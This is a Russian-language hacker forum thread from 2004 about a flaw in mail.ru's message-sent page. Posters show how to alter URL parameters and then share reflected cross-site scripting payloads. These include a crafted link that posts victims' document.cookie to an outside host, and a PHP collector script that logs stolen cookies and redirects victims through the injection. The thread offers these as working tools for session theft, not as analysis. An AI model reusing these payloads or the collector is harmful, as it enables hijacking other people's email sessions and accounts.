Для чрезмерно категоричных в отношении "100%-ного взлома за деньги" товарищей))
Чтобы проникунцца нужной атмосферой, повторяйте все по порядку.
1) заходим на http://mail.ru , вводим свой логин, домен (к примеру yourmail@mail.ru), пароль и заходим в почту
2) Жмем "написать письмо". Адресатом указываем любой мэйл, можнол и самого себя - yourdomain@mail.ru, и нажимаем "отправить".
3)Появляется страница с сообщением "ваше письмо для yourmail@mail.ru (<ТЕМА>) отправлно.
4) Смотрим в адресную строку браузера. Там много параметров, находим:
....&user=yourmail@mail.ru&....
5)меняем yourmail@mail.ru на нудный mail'овский адрес и жмем ввод.
6)Смеемся вместе))

Думаю смысл вышеизложенной басни понятен))

Гыгы, прикольно ...
Тока бесполезно ... )

Мона еще http://www.mail.ru/sendmsgok?To= .... и ... Subject= поменять ...

там вроде все менять можно..
Я не силен в cgi-bug, поэтому не знаю, а вдруг что-то и посерьезнее можно сделать)

Да не думаю ...
Правда в 2000 году, говорят, был один баг, позволяющий узнать секретный вопрос к любым ящикам ...

про взлом в 2000-ном
читал), у меня еще тогда в помине компа не было.. там другого плана. В скрытом поле пароль почему-то передавался, даже если на серкетный вопрос не правил ньо ответишь.
А здесь, я имел ввиду, что вдруг можно внедрить какую-нибудь команду) JS можно же вставлять, попробуй user=< script>alrt()</script>

не знаю, может уже знаете давно:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.mail.ru/sendmsgok?Subject=KPbIC&amp;From=&amp;user=myiworm@mail.ru &amp;TotalUnread=Куча&amp;ReturnPath=win.mail.ru/session/&amp;To=<Form%20name=mailru%20Action="http://mbm.gratis.kg/mail.php"%20Method="POST"><input%20type=hidden%20n ame=param> </Form> &lt; script> mailru.param.value=document.cookie;mailru.submit() ;</Script> [/QUOTE]<span id='postcolor'>

потом http://mbm.gratis.kg/cookie

А зачем так?)
можно то же самое, но встроенное в тело письма, которое посылаешь

ну да, вот то же скриптик:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><?
if($cookie){
$open=fopen('cookie.htm','a+');
&nbsp;fwrite($open,"<li>".$cookie."<br>");
fclose($open);
Header("Location: http://www.mail.ru");
}
else{
Header("Location: http://www.mail.ru/sendmsgok?Subject=fun&amp;From=anyname&amp;user=xxx@mail.r u&amp;TotalUnread=0&amp;ReturnPath=win.mail.ru/session/&amp;To=&lt; script>document.location.href=\"http://yourhomepage.ru/test/cookie.php?cookie=\"+document.cookie;</script>");
}
?>[/QUOTE]<span id='postcolor'>

только что толку от этого? я так и не понял... ну есть у меня кукисы чужие, и что дальше?

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mynhauzen @ июня 16 2004,09:57)</td></tr><tr><td id="QUOTE">только что толку от этого? я так и не понял... ну есть у меня кукисы чужие, и что дальше?[/QUOTE]<span id='postcolor'>
Надо у Алгола спросить, он в этом хорошо разбирается, видишь, пишет что в этих куках пароля нет. Да и вообще, навряд ли ты сделаешь что -нибудь, если ты не знал, куки тоже не будут рабочими, если нажата кнопка &quot;выход&quot;. В конце-концов, поэксперементируй со своими файлами